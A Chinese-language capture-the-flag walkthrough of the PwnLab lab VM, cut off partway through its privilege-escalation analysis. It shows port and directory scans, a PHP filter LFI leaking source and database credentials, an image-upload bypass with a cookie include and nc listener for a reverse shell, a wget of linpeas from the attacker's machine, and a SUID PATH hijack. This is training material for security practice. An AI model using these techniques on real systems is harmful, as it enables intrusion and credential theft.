![\"image-20240223101356389\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402231423725.png\")
<\/div><\/p>\n\u770b\u4e0a\u53bb\u4f3c\u4e4e\u5f88\u53cb\u5584\uff0c\u6253\u5f00\u770b\u4e00\u4e0b\uff0c\u548c\u4ee5\u524d\u4e00\u6837\uff0c\u91c7\u7528NAT\u6a21\u5f0f\u4f7f\u7528\uff1a<\/p>\n
![\"image-20240223102650132\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402231423727.png\")
<\/div><\/p>\n\u626b\u4e00\u4e0b\uff1a<\/p>\n
![\"image-20240223103001041\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402231423728.png\")
<\/div><\/p>\n\u53c8\u662f\u98ce\u5e73\u6d6a\u9759\u7684\u4e00\u5929\uff0c\u771f\u597d\u3002\u3002\u3002<\/p>\n
\u5f00\u59cb\u516c\u9e21\uff01\uff01\uff01<\/p>\n
\u4fe1\u606f\u641c\u96c6<\/h2>\n\u7aef\u53e3\u626b\u63cf<\/h3>\nrustscan -a 192.168.244.134 -- -A -sV -sT<\/code><\/pre>\n.----. .-. .-. .----..---. .----. .---. .--. .-. .-.\n| {} }| { } |{ {__ {_ _}{ {__ \/ ___} \/ {} \\ | `| |\n| .-. \\| {_} |.-._} } | | .-._} }\\ }\/ \/\\ \\| |\\ |\n`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nNmap? More like slowmap.\ud83d\udc22\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 192.168.244.134:80\nOpen 192.168.244.134:111\nOpen 192.168.244.134:3306\nOpen 192.168.244.134:44194\n[~] Starting Script(s)\n[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")\n\n[~] Starting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-02-22 21:34 EST\nNSE: Loaded 156 scripts for scanning.\nNSE: Script Pre-scanning.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 21:34\nCompleted NSE at 21:34, 0.00s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 21:34\nCompleted NSE at 21:34, 0.00s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 21:34\nCompleted NSE at 21:34, 0.00s elapsed\nInitiating Ping Scan at 21:34\nScanning 192.168.244.134 [2 ports]\nCompleted Ping Scan at 21:34, 0.00s elapsed (1 total hosts)\nInitiating Parallel DNS resolution of 1 host. at 21:34\nCompleted Parallel DNS resolution of 1 host. at 21:34, 4.24s elapsed\nDNS resolution of 1 IPs took 4.24s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 2, CN: 0]\nInitiating Connect Scan at 21:34\nScanning 192.168.244.134 [4 ports]\nDiscovered open port 80\/tcp on 192.168.244.134\nDiscovered open port 111\/tcp on 192.168.244.134\nDiscovered open port 3306\/tcp on 192.168.244.134\nDiscovered open port 44194\/tcp on 192.168.244.134\nCompleted Connect Scan at 21:34, 0.00s elapsed (4 total ports)\nInitiating Service scan at 21:34\nScanning 4 services on 192.168.244.134\nCompleted Service scan at 21:34, 11.05s elapsed (4 services on 1 host)\nNSE: Script scanning 192.168.244.134.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 21:34\nCompleted NSE at 21:34, 0.16s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 21:34\nCompleted NSE at 21:34, 0.02s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 21:34\nCompleted NSE at 21:34, 0.00s elapsed\nNmap scan report for 192.168.244.134\nHost is up, received syn-ack (0.00058s latency).\nScanned at 2024-02-22 21:34:13 EST for 11s\n\nPORT STATE SERVICE REASON VERSION\n80\/tcp open http syn-ack Apache httpd 2.4.10 ((Debian))\n| http-methods: \n|_ Supported Methods: GET HEAD POST OPTIONS\n|_http-server-header: Apache\/2.4.10 (Debian)\n|_http-title: PwnLab Intranet Image Hosting\n111\/tcp open rpcbind syn-ack 2-4 (RPC #100000)\n| rpcinfo: \n| program version port\/proto service\n| 100000 2,3,4 111\/tcp rpcbind\n| 100000 2,3,4 111\/udp rpcbind\n| 100000 3,4 111\/tcp6 rpcbind\n| 100000 3,4 111\/udp6 rpcbind\n| 100024 1 40471\/udp6 status\n| 100024 1 44194\/tcp status\n| 100024 1 48585\/udp status\n|_ 100024 1 57355\/tcp6 status\n3306\/tcp open mysql syn-ack MySQL 5.5.47-0+deb8u1\n| mysql-info: \n| Protocol: 10\n| Version: 5.5.47-0+deb8u1\n| Thread ID: 40\n| Capabilities flags: 63487\n| Some Capabilities: Support41Auth, Speaks41ProtocolOld, IgnoreSpaceBeforeParenthesis, SupportsTransactions, LongPassword, SupportsLoadDataLocal, IgnoreSigpipes, Speaks41ProtocolNew, ConnectWithDatabase, DontAllowDatabaseTableColumn, SupportsCompression, InteractiveClient, ODBCClient, LongColumnFlag, FoundRows, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins\n| Status: Autocommit\n| Salt: `MA<J=3&cDfW_Wvl<'L*\n|_ Auth Plugin Name: mysql_native_password\n44194\/tcp open status syn-ack 1 (RPC #100024)\n\nNSE: Script Post-scanning.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 21:34\nCompleted NSE at 21:34, 0.00s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 21:34\nCompleted NSE at 21:34, 0.00s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 21:34\nCompleted NSE at 21:34, 0.00s elapsed\nRead data files from: \/usr\/bin\/..\/share\/nmap\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 16.50 seconds<\/code><\/pre>\n\u8bbf\u95ee\u4e00\u4e0b<\/h3>\n
![\"image-20240223103817519\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div><\/p>\n<\/div><\/p>\n\u5c1d\u8bd5\u4e07\u80fd\u5bc6\u7801\uff0c\u4f46\u662f\u767b\u5f55\u5931\u8d25\u4e86\uff01<\/p>\n
<\/div><\/p>\nWappalyzer<\/h3>\n
<\/div><\/p>\n\u9605\u8bfb\u4e00\u4e0b\u6e90\u7801\uff0c\u770b\u770b\u6709\u6ca1\u6709\u6536\u83b7\uff0c\u4f46\u662f\u6ca1\u53d1\u73b0\u5565\u6709\u7528\u7684\u4e1c\u897f\uff01<\/p>\n
\u76ee\u5f55\u626b\u63cf<\/h3>\ngobuster dir -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -u http:\/\/192.168.244.134 -f -t 200<\/code><\/pre>\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: http:\/\/192.168.244.134\n[+] Method: GET\n[+] Threads: 200\n[+] Wordlist: \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes: 404\n[+] User Agent: gobuster\/3.6\n[+] Add Slash: true\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/upload\/ (Status: 200) [Size: 744]\n\/images\/ (Status: 200) [Size: 944]\n\/icons\/ (Status: 403) [Size: 296]\n\/server-status\/ (Status: 403) [Size: 304]\nProgress: 220560 \/ 220561 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n\u6211\u4eec\u518d\u770b\u4e00\u4e0b\u6709\u5565\u4fe1\u606f\uff1a<\/p>\n
<\/div>
\n<\/div><\/p>\nNikto<\/h3>\nnikto -h http:\/\/192.168.244.134<\/code><\/pre>\n- Nikto v2.5.0\n---------------------------------------------------------------------------\n+ Target IP: 192.168.244.134\n+ Target Hostname: 192.168.244.134\n+ Target Port: 80\n+ Start Time: 2024-02-22 22:24:38 (GMT-5)\n---------------------------------------------------------------------------\n+ Server: Apache\/2.4.10 (Debian)\n+ \/: The anti-clickjacking X-Frame-Options header is not present. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Headers\/X-Frame-Options\n+ \/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https:\/\/www.netsparker.com\/web-vulnerability-scanner\/vulnerabilities\/missing-content-type-header\/\n+ No CGI Directories found (use '-C all' to force check all possible dirs)\n+ \/images: The web server may reveal its internal or real IP in the Location header via a request to with HTTP\/1.0. The value is "127.0.0.1". See: http:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2000-0649\n+ Apache\/2.4.10 appears to be outdated (current is at least Apache\/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.\n+ \/login.php: Cookie PHPSESSID created without the httponly flag. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Cookies\n+ \/: Web Server returns a valid response with junk HTTP methods which may cause false positives.\n+ \/config.php: PHP Config file may contain database IDs and passwords.\n+ \/images\/: Directory indexing found.\n+ \/icons\/README: Apache default file found. See: https:\/\/www.vntweb.co.uk\/apache-restricting-access-to-iconsreadme\/\n+ \/login.php: Admin login page\/section found.\n+ \/#wp-config.php#: #wp-config.php# file found. This file contains the credentials.\n+ 8102 requests: 0 error(s) and 11 item(s) reported on remote host\n+ End Time: 2024-02-22 22:24:55 (GMT-5) (17 seconds)\n---------------------------------------------------------------------------\n+ 1 host(s) tested<\/code><\/pre>\n\u6f0f\u6d1e\u5229\u7528<\/h2>\nLFI<\/h3>\n
\u626b\u51fa\u6765\u7684\u4e1c\u897f\u611f\u89c9\u6bd4\u8f83\u5c11\uff0c\u4f46\u662f\u4e5f\u8fd8\u6709\u7528\uff0c\u518d\u770b\u770b\u6709\u5565\u5229\u7528\u7684\u5730\u65b9\uff1a<\/p>\n
<\/div><\/p>\n\u56fe\u7247\u4e5f\u6ca1\u6709\u9690\u5199\u3002<\/p>\n
\u518d\u6b21\u67e5\u627e\uff0c\u770b\u5230\u51e0\u4e2a\u7f51\u5740\u597d\u50cf\u53ef\u4ee5\u5c1d\u8bd5\u8fdb\u884c\u5229\u7528\uff1a<\/p>\n
http:\/\/192.168.244.134\/?page=login\nhttp:\/\/192.168.244.134\/?page=upload<\/code><\/pre>\n\u53ef\u4ee5\u5c1d\u8bd5LFI<\/code>\u5229\u7528\uff1a<\/p>\nhttp:\/\/192.168.244.134\/?page=php:\/\/filter\/read=convert.base64-encode\/resource=login<\/code><\/pre>\n<\/div><\/p>\n\u770b\u6765\u5c31\u53ef\u4ee5\u4f7f\u7528\u4e86\uff0c\u89e3\u7801\u4e00\u4e0b\uff1a<\/p>\n
PD9waHANCnNlc3Npb25fc3RhcnQoKTsNCnJlcXVpcmUoImNvbmZpZy5waHAiKTsNCiRteXNxbGkgPSBuZXcgbXlzcWxpKCRzZXJ2ZXIsICR1c2VybmFtZSwgJHBhc3N3b3JkLCAkZGF0YWJhc2UpOw0KDQppZiAoaXNzZXQoJF9QT1NUWyd1c2VyJ10pIGFuZCBpc3NldCgkX1BPU1RbJ3Bhc3MnXSkpDQp7DQoJJGx1c2VyID0gJF9QT1NUWyd1c2VyJ107DQoJJGxwYXNzID0gYmFzZTY0X2VuY29kZSgkX1BPU1RbJ3Bhc3MnXSk7DQoNCgkkc3RtdCA9ICRteXNxbGktPnByZXBhcmUoIlNFTEVDVCAqIEZST00gdXNlcnMgV0hFUkUgdXNlcj0\/IEFORCBwYXNzPT8iKTsNCgkkc3RtdC0+YmluZF9wYXJhbSgnc3MnLCAkbHVzZXIsICRscGFzcyk7DQoNCgkkc3RtdC0+ZXhlY3V0ZSgpOw0KCSRzdG10LT5zdG9yZV9SZXN1bHQoKTsNCg0KCWlmICgkc3RtdC0+bnVtX3Jvd3MgPT0gMSkNCgl7DQoJCSRfU0VTU0lPTlsndXNlciddID0gJGx1c2VyOw0KCQloZWFkZXIoJ0xvY2F0aW9uOiA\/cGFnZT11cGxvYWQnKTsNCgl9DQoJZWxzZQ0KCXsNCgkJZWNobyAiTG9naW4gZmFpbGVkLiI7DQoJfQ0KfQ0KZWxzZQ0Kew0KCT8+DQoJPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0iUE9TVCI+DQoJPGxhYmVsPlVzZXJuYW1lOiA8L2xhYmVsPjxpbnB1dCBpZD0idXNlciIgdHlwZT0idGVzdCIgbmFtZT0idXNlciI+PGJyIC8+DQoJPGxhYmVsPlBhc3N3b3JkOiA8L2xhYmVsPjxpbnB1dCBpZD0icGFzcyIgdHlwZT0icGFzc3dvcmQiIG5hbWU9InBhc3MiPjxiciAvPg0KCTxpbnB1dCB0eXBlPSJzdWJtaXQiIG5hbWU9InN1Ym1pdCIgdmFsdWU9IkxvZ2luIj4NCgk8L2Zvcm0+DQoJPD9waHANCn0NCg==<\/code><\/pre>\n<?php\nsession_start();\nrequire("config.php");\n$mysqli = new mysqli($server, $username, $password, $database);\n\nif (isset($_POST['user']) and isset($_POST['pass']))\n{\n $luser = $_POST['user'];\n $lpass = base64_encode($_POST['pass']);\n\n $stmt = $mysqli->prepare("SELECT * FROM users WHERE user=? AND pass=?");\n $stmt->bind_param('ss', $luser, $lpass);\n\n $stmt->execute();\n $stmt->store_Result();\n\n if ($stmt->num_rows == 1)\n {\n $_SESSION['user'] = $luser;\n header('Location: ?page=upload');\n }\n else\n {\n echo "Login failed.";\n }\n}\nelse\n{\n ?>\n <form action="" method="POST">\n <label>Username: <\/label><input id="user" type="test" name="user"><br \/>\n <label>Password: <\/label><input id="pass" type="password" name="pass"><br \/>\n <input type="submit" name="submit" value="Login">\n <\/form>\n <?php\n}<\/code><\/pre>\n\u53d1\u73b0\u5305\u542b\u4e86\u4e00\u4e2acookie=lang<\/code>\uff1a<\/p>\n<\/div><\/p>\nhttp:\/\/192.168.244.134\/?page=php:\/\/filter\/read=convert.base64-encode\/resource=config<\/code><\/pre>\n<\/div><\/p>\nPD9waHANCiRzZXJ2ZXIJICA9ICJsb2NhbGhvc3QiOw0KJHVzZXJuYW1lID0gInJvb3QiOw0KJHBhc3N3b3JkID0gIkg0dSVRSl9IOTkiOw0KJGRhdGFiYXNlID0gIlVzZXJzIjsNCj8+<\/code><\/pre>\n<?php\n$server = "localhost";\n$username = "root";\n$password = "H4u%QJ_H99";\n$database = "Users";\n?><\/code><\/pre>\n\u627e\u5230\u4e86\u8d26\u53f7\u5bc6\u7801\uff01\uff01<\/p>\n
http:\/\/192.168.244.134\/?page=php:\/\/filter\/convert.base64-encode\/resource=..\/..\/..\/..\/..\/etc\/passwd\n# \u65e0\u56de\u663e<\/code><\/pre>\n\u5c1d\u8bd5\u767b\u5f55\u6570\u636e\u5e93\uff1a<\/p>\n
mysql -uroot -pH4u%QJ_H99 -h 192.168.244.134\nWelcome to the MariaDB monitor. Commands end with ; or \\g.\nYour MySQL connection id is 73\nServer version: 5.5.47-0+deb8u1 (Debian)\n\nCopyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.\n\nType 'help;' or '\\h' for help. Type '\\c' to clear the current input statement.\n\nMySQL [(none)]> show databases;\n+--------------------+\n| Database |\n+--------------------+\n| information_schema |\n| Users |\n+--------------------+\n2 rows in set (0.001 sec)\n\nMySQL [(none)]> use Users;\nReading table information for completion of table and column names\nYou can turn off this feature to get a quicker startup with -A\n\nDatabase changed\nMySQL [Users]> show tables;\n+-----------------+\n| Tables_in_Users |\n+-----------------+\n| users |\n+-----------------+\n1 row in set (0.001 sec)\n\nMySQL [Users]> select * from users;\n+------+------------------+\n| user | pass |\n+------+------------------+\n| kent | Sld6WHVCSkpOeQ== |\n| mike | U0lmZHNURW42SQ== |\n| kane | aVN2NVltMkdSbw== |\n+------+------------------+\n3 rows in set (0.002 sec)<\/code><\/pre>\n\u89e3\u7801\u7ed3\u679c\uff1a<\/p>\n
+------+------------------------------+\n| user | pass |\n+------+------------------------------+\n| kent | Sld6WHVCSkpOeQ==(JWzXuBJJNy) |\n| mike | U0lmZHNURW42SQ==(SIfdsTEn6I) |\n| kane | aVN2NVltMkdSbw==(iSv5Ym2GRo) |\n+------+------------------------------+<\/code><\/pre>\n\u5c1d\u8bd5\u8fdb\u884c\u767b\u5f55\uff0c\u6210\u529f\u8fdb\u5165\uff1a<\/p>\n
<\/div><\/p>\n\u200b \u67e5\u770b\u4e00\u4e0b\u4e0a\u4f20\u7684\u4ee3\u7801\uff1a<\/p>\n
http:\/\/192.168.244.134\/?page=php:\/\/filter\/read=convert.base64-encode\/resource=upload<\/code><\/pre>\nPD9waHANCnNlc3Npb25fc3RhcnQoKTsNCmlmICghaXNzZXQoJF9TRVNTSU9OWyd1c2VyJ10pKSB7IGRpZSgnWW91IG11c3QgYmUgbG9nIGluLicpOyB9DQo\/Pg0KPGh0bWw+DQoJPGJvZHk+DQoJCTxmb3JtIGFjdGlvbj0nJyBtZXRob2Q9J3Bvc3QnIGVuY3R5cGU9J211bHRpcGFydC9mb3JtLWRhdGEnPg0KCQkJPGlucHV0IHR5cGU9J2ZpbGUnIG5hbWU9J2ZpbGUnIGlkPSdmaWxlJyAvPg0KCQkJPGlucHV0IHR5cGU9J3N1Ym1pdCcgbmFtZT0nc3VibWl0JyB2YWx1ZT0nVXBsb2FkJy8+DQoJCTwvZm9ybT4NCgk8L2JvZHk+DQo8L2h0bWw+DQo8P3BocCANCmlmKGlzc2V0KCRfUE9TVFsnc3VibWl0J10pKSB7DQoJaWYgKCRfRklMRVNbJ2ZpbGUnXVsnZXJyb3InXSA8PSAwKSB7DQoJCSRmaWxlbmFtZSAgPSAkX0ZJTEVTWydmaWxlJ11bJ25hbWUnXTsNCgkJJGZpbGV0eXBlICA9ICRfRklMRVNbJ2ZpbGUnXVsndHlwZSddOw0KCQkkdXBsb2FkZGlyID0gJ3VwbG9hZC8nOw0KCQkkZmlsZV9leHQgID0gc3RycmNocigkZmlsZW5hbWUsICcuJyk7DQoJCSRpbWFnZWluZm8gPSBnZXRpbWFnZXNpemUoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddKTsNCgkJJHdoaXRlbGlzdCA9IGFycmF5KCIuanBnIiwiLmpwZWciLCIuZ2lmIiwiLnBuZyIpOyANCg0KCQlpZiAoIShpbl9hcnJheSgkZmlsZV9leHQsICR3aGl0ZWxpc3QpKSkgew0KCQkJZGllKCdOb3QgYWxsb3dlZCBleHRlbnNpb24sIHBsZWFzZSB1cGxvYWQgaW1hZ2VzIG9ubHkuJyk7DQoJCX0NCg0KCQlpZihzdHJwb3MoJGZpbGV0eXBlLCdpbWFnZScpID09PSBmYWxzZSkgew0KCQkJZGllKCdFcnJvciAwMDEnKTsNCgkJfQ0KDQoJCWlmKCRpbWFnZWluZm9bJ21pbWUnXSAhPSAnaW1hZ2UvZ2lmJyAmJiAkaW1hZ2VpbmZvWydtaW1lJ10gIT0gJ2ltYWdlL2pwZWcnICYmICRpbWFnZWluZm9bJ21pbWUnXSAhPSAnaW1hZ2UvanBnJyYmICRpbWFnZWluZm9bJ21pbWUnXSAhPSAnaW1hZ2UvcG5nJykgew0KCQkJZGllKCdFcnJvciAwMDInKTsNCgkJfQ0KDQoJCWlmKHN1YnN0cl9jb3VudCgkZmlsZXR5cGUsICcvJyk+MSl7DQoJCQlkaWUoJ0Vycm9yIDAwMycpOw0KCQl9DQoNCgkJJHVwbG9hZGZpbGUgPSAkdXBsb2FkZGlyIC4gbWQ1KGJhc2VuYW1lKCRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkuJGZpbGVfZXh0Ow0KDQoJCWlmIChtb3ZlX3VwbG9hZGVkX2ZpbGUoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddLCAkdXBsb2FkZmlsZSkpIHsNCgkJCWVjaG8gIjxpbWcgc3JjPVwiIi4kdXBsb2FkZmlsZS4iXCI+PGJyIC8+IjsNCgkJfSBlbHNlIHsNCgkJCWRpZSgnRXJyb3IgNCcpOw0KCQl9DQoJfQ0KfQ0KDQo\/Pg==<\/code><\/pre>\n<?php\nsession_start();\nif (!isset($_SESSION['user'])) { die('You must be log in.'); }\n?>\n<html>\n <body>\n <form action='' method='post' enctype='multipart\/form-data'>\n <input type='file' name='file' id='file' \/>\n <input type='submit' name='submit' value='Upload'\/>\n <\/form>\n <\/body>\n<\/html>\n<?php \nif(isset($_POST['submit'])) {\n if ($_FILES['file']['error'] <= 0) {\n $filename = $_FILES['file']['name'];\n $filetype = $_FILES['file']['type'];\n $uploaddir = 'upload\/';\n $file_ext = strrchr($filename, '.');\n $imageinfo = getimagesize($_FILES['file']['tmp_name']);\n $whitelist = array(".jpg",".jpeg",".gif",".png"); \n\n if (!(in_array($file_ext, $whitelist))) {\n die('Not allowed extension, please upload images only.');\n }\n\n if(strpos($filetype,'image') === false) {\n die('Error 001');\n }\n\n if($imageinfo['mime'] != 'image\/gif' && $imageinfo['mime'] != 'image\/jpeg' && $imageinfo['mime'] != 'image\/jpg'&& $imageinfo['mime'] != 'image\/png') {\n die('Error 002');\n }\n\n if(substr_count($filetype, '\/')>1){\n die('Error 003');\n }\n\n $uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])).$file_ext;\n\n if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) {\n echo "<img src=\\"".$uploadfile."\\"><br \/>";\n } else {\n die('Error 4');\n }\n }\n}\n\n?><\/code><\/pre>\n\u53d1\u73b0\u6587\u4ef6\u9650\u5236\u4f20.jpg,.jpeg,.gif,.png<\/code>\u51e0\u79cd\u6587\u4ef6\uff0c\u4fee\u6539\u4e00\u4e0b\u5c1d\u8bd5\u4e0a\u4f20\uff1a<\/p>\n<\/div><\/p>\n\u5728\u6587\u4ef6\u5934\u52a0\u4e0aGIFa89<\/code>\uff1a<\/p>\n<\/div><\/p>\n<\/div><\/p>\ncurl 192.168.244.134 -H "cookie:lang=..\/upload\/e4919f92b26f69d7e89d2ef400c78a97.gif"\n\nnc -lvp 1234<\/code><\/pre>\n\u63d0\u6743<\/h2>\nwhoami\nid\npython -c 'import pty; pty.spawn("\/bin\/sh")'<\/code><\/pre>\n\u67e5\u770b\u4e00\u4e9b\u6709\u65e0root<\/code>\u6743\u9650\u7528\u6237\uff1a<\/p>\n<\/div><\/p>\n# kali\npython3 -m http.server 8888\n# kane\ncd \/tmp\nwget http:\/\/192.168.244.128:8888\/linpeas.sh\nchmod +x linpeas.sh<\/code><\/pre>\n\u8fdb\u884c\u4fe1\u606f\u641c\u96c6\uff0c\u770b\u5230\u4e86\u4e00\u4e2a\u6709\u8da3\u7684SUID<\/code>\uff1a<\/p>\n<\/div><\/p>\n<\/div><\/p>\n\u67e5\u770b\u4e00\u4e0b\uff1a<\/p>\n
cd \/home\/kane\nls -la\n# total 32\n# drwxr-x--- 3 kane kane 4096 Feb 22 23:56 .\n# drwxr-xr-x 6 root root 4096 Mar 17 2016 ..\n# -rw-r--r-- 1 kane kane 220 Mar 17 2016 .bash_logout\n# -rw-r--r-- 1 kane kane 3515 Mar 17 2016 .bashrc\n# drwx------ 2 kane kane 4096 Feb 22 23:56 .gnupg\n# -rwsr-sr-x 1 mike mike 5148 Mar 17 2016 msgmike\n# -rw-r--r-- 1 kane kane 675 Mar 17 2016 .profile\n.\/msgmike\n# cat: \/home\/mike\/msg.txt: No such file or directory\necho $PATH\n# \/usr\/local\/bin:\/usr\/bin:\/bin:\/usr\/local\/games:\/usr\/games<\/code><\/pre>\nfind \/ -perm -u=s -type f 2>\/dev\/null\n# \/bin\/mount\n# \/bin\/su\n# \/bin\/umount\n# \/sbin\/mount.nfs\n# \/home\/kane\/msgmike\n# \/usr\/bin\/newgrp\n# \/usr\/bin\/chfn\n# \/usr\/bin\/at\n# \/usr\/bin\/passwd\n# \/usr\/bin\/procmail\n# \/usr\/bin\/chsh\n# \/usr\/bin\/gpasswd\n# \/usr\/lib\/eject\/dmcrypt-get-device\n# \/usr\/lib\/pt_chown\n# \/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n# \/usr\/lib\/openssh\/ssh-keysign\n# \/usr\/sbin\/exim4<\/code><\/pre>\n\u770b\u6765\u5f97\u83b7\u5f97\u4e00\u4e2amike<\/code>\u7528\u6237\u7684shell\uff1a<\/p>\necho bash -p > cat\nchmod 777 cat\nPATH=.:$PATH .\/msgmike<\/code><\/pre>\n<\/div><\/p>\n\u6211\u4eec\u5c1d\u8bd5\u4f20\u5230\u672c\u5730\u8fdb\u884c\u5206\u6790\u4e00\u4e0b\uff1a<\/p>\n
# mike\npython -m SimpleHTTPServer 8877\n\n# kali\nwget http:\/\/192.168.244.134:8877\/msg2root<\/code><\/pre>\n\u4f7f\u7528\u76f8\u5173\u5de5\u5177\u7b80\u5355\u5206\u6790\u4e00\u4e0b\u8fd9\u4e2a\u6587\u4ef6\uff0c\u6216\u8005\u4f7f\u7528IDA<\/code>\u8fdb\u884c\u5206\u6790\uff1a<\/p>\nobjdump -D -M intel msg2root | less<\/code><\/pre>\n\u5206\u6790\u4e00\u4e0b\u4e3b\u51fd\u6570\uff1a<\/p>\n
080484ab <main>:\n 80484ab: 8d 4c 24 04 lea ecx,[esp+0x4]\n 80484af: 83 e4 f0 and esp,0xfffffff0\n 80484b2: ff 71 fc push DWORD PTR [ecx-0x4]\n 80484b5: 55 push ebp\n 80484b6: 89 e5 mov ebp,esp\n 80484b8: 51 push ecx\n 80484b9: 83 ec 74 sub esp,0x74\n 80484bc: 83 ec 0c sub esp,0xc\n 80484bf: 68 b0 85 04 08 push 0x80485b0\n 80484c4: e8 87 fe ff ff call 8048350 <printf@plt>\n 80484c9: 83 c4 10 add esp,0x10\n 80484cc: a1 f4 97 04 08 mov eax,ds:0x80497f4\n 80484d1: 83 ec 04 sub esp,0x4\n 80484d4: 50 push eax\n 80484c9: 83 c4 10 add esp,0x10\n 80484cc: a1 f4 97 04 08 mov eax,ds:0x80497f4\n 80484d1: 83 ec 04 sub esp,0x4\n 80484d4: 50 push eax\n 80484d5: 6a 64 push 0x64\n 80484d7: 8d 45 90 lea eax,[ebp-0x70]\n 80484da: 50 push eax\n 80484db: e8 80 fe ff ff call 8048360 <fgets@plt>\n 80484e0: 83 c4 10 add esp,0x10\n 80484e3: 83 ec 04 sub esp,0x4\n 80484e6: 8d 45 90 lea eax,[ebp-0x70]\n 80484e9: 50 push eax\n 80484ea: 68 c4 85 04 08 push 0x80485c4\n 80484ef: 8d 45 f4 lea eax,[ebp-0xc]\n 80484f2: 50 push eax\n 80484f3: e8 a8 fe ff ff call 80483a0 <asprintf@plt>\n 80484f8: 83 c4 10 add esp,0x10\n 80484fb: 8b 45 f4 mov eax,DWORD PTR [ebp-0xc]\n 80484fe: 83 ec 0c sub esp,0xc\n 8048501: 50 push eax\n 8048502: e8 69 fe ff ff call 8048370 <system@plt>\n 8048507: 83 c4 10 add esp,0x10\n 804850a: 8b 4d fc mov ecx,DWORD PTR [ebp-0x4]\n 804850d: c9 leave\n 804850e: 8d 61 fc lea esp,[ecx-0x4]\n 8048511: c3 ret\n 8048512: 66 90 xchg ax,ax\n 8048514: 66 90 xchg ax,ax\n 8048516: 66 90 xchg ax,ax\n 8048518: 66 90 xchg ax,ax\n 804851a: 66 90 xchg ax,ax\n 804851c: 66 90 xchg ax,ax\n 804851e: 66 90 xchg ax,ax<\/code><\/pre>\nobjdump -s -j .rodata msg2root<\/code><\/pre>\nmsg2root: file format elf32-i386\nContents of section .rodata:\n 80485a8 03000000 01000200 4d657373 61676520 ........Message \n 80485b8 666f7220 726f6f74 3a200000 2f62696e for root: ..\/bin\n 80485c8 2f656368 6f202573 203e3e20 2f726f6f \/echo %s >> \/roo\n 80485d8 742f6d65 73736167 65732e74 787400 t\/messages.txt. <\/code><\/pre>\nIDA<\/code>\u53cd\u6c47\u7f16\u7ed3\u679c\u4e3a\uff1a<\/p>\n# main \u51fd\u6570\nint __cdecl main(int argc, const char **argv, const char **envp)\n{\n char s; \/\/ [esp+8h] [ebp-70h]\n char *command; \/\/ [esp+6Ch] [ebp-Ch]\n\n printf("Message for root: ");\n fgets(&s, 100, _bss_start);\n asprintf(&command, "\/bin\/echo %s >> \/root\/messages.txt", &s);\n return system(command);\n}<\/code><\/pre>\n\n- \u6253\u5370\u5b57\u7b26\u4e32 (
printf<\/code>)<\/li>\n- \u4ece\u7528\u6237\u5904\u83b7\u53d6\u4e00\u4e2a\u5b57\u7b26\u4e32\u5e76\u5c06\u5176\u5b58\u50a8\u5728\u5806\u6808\u4e2d\u7684
[ebp-0x70]<\/code>( fgets<\/code>)<\/li>\n- \u5c06\u8f93\u5165\u5b57\u7b26\u4e32\u63d2\u5165\u5230\u683c\u5f0f\u5b57\u7b26\u4e32\u4e2d
